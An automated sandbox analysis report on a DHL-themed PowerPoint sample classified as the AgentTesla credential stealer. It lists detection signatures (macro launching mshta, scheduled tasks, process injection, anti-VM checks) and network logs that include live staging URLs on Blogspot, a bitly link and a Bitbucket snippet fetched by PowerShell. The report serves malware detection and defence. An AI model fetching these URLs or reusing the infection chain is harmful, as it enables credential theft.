Windows Analysis Report DHLForm.ppt

Overview

General Information

Sample Name: DHLForm.ppt
Analysis ID: 483878
MD5: 5a5ff1cffdb0ea343fd5ab32c6eeb740
SHA1: e372c4f53febe5c4d74a01eb6985e80a31d52e25
SHA256: 9e4134fbb243efdb6d965eec21d98b4ad702e7fca13b5f1af47d30e3b0019585
Tags: PowershellpptPS-3losh-ratRat
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected AgentTesla
Yara detected AntiVM3
Multi AV Scanner detection for submitted file
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Compiles code for process injection (via .Net compiler)
Writes or reads registry keys via WMI
Injects a PE file into a foreign processes
Sigma detected: MSHTA Spawning Windows Shell
Writes registry values via WMI
Document exploit detected (process start blacklist hit)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Creates a scheduled task launching mshta.exe (likely to bypass HIPS)
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Mshta Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Uses insecure TLS / SSL version for HTTPS connection
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Compiles C# or VB.Net code
Connects to a URL shortener service
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Document contains an embedded VBA macro which executes code when the document is opened / closed
Yara detected Credential Stealer
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Enables debug privileges
PE file does not import any functions
Installs a global mouse hook
Document contains embedded VBA macros
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs HTTP gets)

Classification

AV Detection:

barindex
Multi AV Scanner detection for submitted file
Source: DHLForm.ppt Virustotal: Detection: 22% Perma Link
Source: DHLForm.ppt ReversingLabs: Detection: 22%
Antivirus or Machine Learning detection for unpacked file
Source: 40.2.RegAsm.exe.400000.0.unpack Avira: Label: TR/Spy.Gen8

Compliance:

barindex
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49778 version: TLS 1.0
Source: unknown HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49786 version: TLS 1.0
Source: unknown HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49840 version: TLS 1.0
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 67.199.248.15:443 -> 192.168.2.3:49743 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.225:443 -> 192.168.2.3:49744 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.233:443 -> 192.168.2.3:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.233:443 -> 192.168.2.3:49751 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.13:443 -> 192.168.2.3:49753 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.3:49757 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.203.110:443 -> 192.168.2.3:49758 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.35:443 -> 192.168.2.3:49765 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.225:443 -> 192.168.2.3:49770 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.233:443 -> 192.168.2.3:49771 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.13:443 -> 192.168.2.3:49774 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.3:49776 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.203.110:443 -> 192.168.2.3:49777 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.225:443 -> 192.168.2.3:49781 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.233:443 -> 192.168.2.3:49783 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.13:443 -> 192.168.2.3:49785 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.3:49788 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.203.110:443 -> 192.168.2.3:49789 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.225:443 -> 192.168.2.3:49790 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.233:443 -> 192.168.2.3:49792 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.13:443 -> 192.168.2.3:49794 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.3:49799 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.203.110:443 -> 192.168.2.3:49800 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.225:443 -> 192.168.2.3:49807 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.233:443 -> 192.168.2.3:49818 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.13:443 -> 192.168.2.3:49828 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.3:49838 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.203.110:443 -> 192.168.2.3:49839 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.225:443 -> 192.168.2.3:49844 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.233:443 -> 192.168.2.3:49845 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.225:443 -> 192.168.2.3:49847 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.13:443 -> 192.168.2.3:49848 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.233:443 -> 192.168.2.3:49850 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.13:443 -> 192.168.2.3:49852 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.3:49855 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.203.110:443 -> 192.168.2.3:49856 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.225:443 -> 192.168.2.3:49858 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.233:443 -> 192.168.2.3:49859 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.13:443 -> 192.168.2.3:49861 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.3:49863 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.203.110:443 -> 192.168.2.3:49866 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.203.110:443 -> 192.168.2.3:49871 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.3:49870 version: TLS 1.2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process created: C:\Windows\SysWOW64\mshta.exe
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.3:49743 -> 67.199.248.15:443
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: bitly.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.3:49743 -> 67.199.248.15:443
Source: powerpnt.exe Memory has grown: Private usage: 0MB later: 49MB

Networking:

barindex
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49778 version: TLS 1.0
Source: unknown HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49786 version: TLS 1.0
Source: unknown HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49840 version: TLS 1.0
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /yuiwqhdsavbdjagh HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bitly.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /p/ayoolaayoola.html HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: johonathahogyaabagebarhomeintum.blogspot.com
Source: global traffic HTTP traffic detected: GET /static/v1/widgets/1667664774-css_bundle_v2.css HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /static/v1/jsbin/403901366-ieretrofit.js HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=8965474558532949541&zx=9facc617-3779-4049-ad62-56a50925e3fb HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /static/v1/jsbin/1621653182-comment_from_post_iframe.js HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /static/v1/widgets/4164007864-widgets.js HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /js/cookienotice.js HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: johonathahogyaabagebarhomeintum.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /img/icon18_edit_allbkg.gif HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: resources.blogblog.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.html&type=blog HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.html%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.html%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: accounts.google.com
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.blogger.com
Source: global traffic HTTP traffic detected: GET /static/v1/v-css/281434096-static_pages.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /css/maia.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /analytics.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google-analytics.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /static/v1/jsbin/3101730221-analytics_autotrack.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /blogblog/data/1kt/simple/body_gradient_tile_light.png HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: resources.blogblog.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /img/share_buttons_20_3.png HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /blogblog/data/1kt/simple/gradients_light.png HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: resources.blogblog.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /s/opensans/v23/mem5YaGs126MiZpBA-UN_r8OUuht.eot HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: fonts.gstatic.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /img/blogger-logotype-color-black-1x.png HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _ga=GA1.2.833016469.1631746236; _gid=GA1.2.19021443.1631746236
Source: global traffic HTTP traffic detected: GET /s/roboto/v27/KFOmCnqEu92Fr1Mu4mxO.eot HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: fonts.gstatic.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /p/ayoola.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: randikhanaekminar.blogspot.com
Source: global traffic HTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=4778963473423104316&zx=f202e5b7-10a8-4731-a0ba-0a7b50381b0c HTTP/1.1Accept: */*Referer: https://randikhanaekminar.blogspot.com/p/ayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /js/cookienotice.js HTTP/1.1Accept: */*Referer: https://randikhanaekminar.blogspot.com/p/ayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: randikhanaekminar.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https://randikhanaekminar.blogspot.com/p/ayoola.html&type=blog HTTP/1.1Accept: */*Referer: https://randikhanaekminar.blogspot.com/p/ayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://randikhanaekminar.blogspot.com/p/ayoola.html%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://randikhanaekminar.blogspot.com/p/ayoola.html%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://randikhanaekminar.blogspot.com/p/ayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: accounts.google.comCookie: __Host-GAPS=1:c9BBumwINGgbKZmhvCsmcJwIqGnQ7A:dvQQZbHicFDLQc5k
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Frandikhanaekminar.blogspot.com%2Fp%2Fayoola.html&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://randikhanaekminar.blogspot.com/p/ayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.blogger.comCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /css/maia.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Frandikhanaekminar.blogspot.com%2Fp%2Fayoola.html&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google.comIf-Modified-Since: Mon, 25 May 2020 08:30:00 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /analytics.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Frandikhanaekminar.blogspot.com%2Fp%2Fayoola.html&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google-analytics.comIf-Modified-Since: Wed, 11 Aug 2021 00:32:57 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: bitbucket.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /p/ayoolaback.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: backbones1234511a.blogspot.com
Source: global traffic HTTP traffic detected: GET /js/cookienotice.js HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: backbones1234511a.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=7680886694920034828&zx=ad70dca0-0e6f-4ddf-9917-2cf3a06acb70 HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https://backbones1234511a.blogspot.com/p/ayoolaback.html%2522&type=blog HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
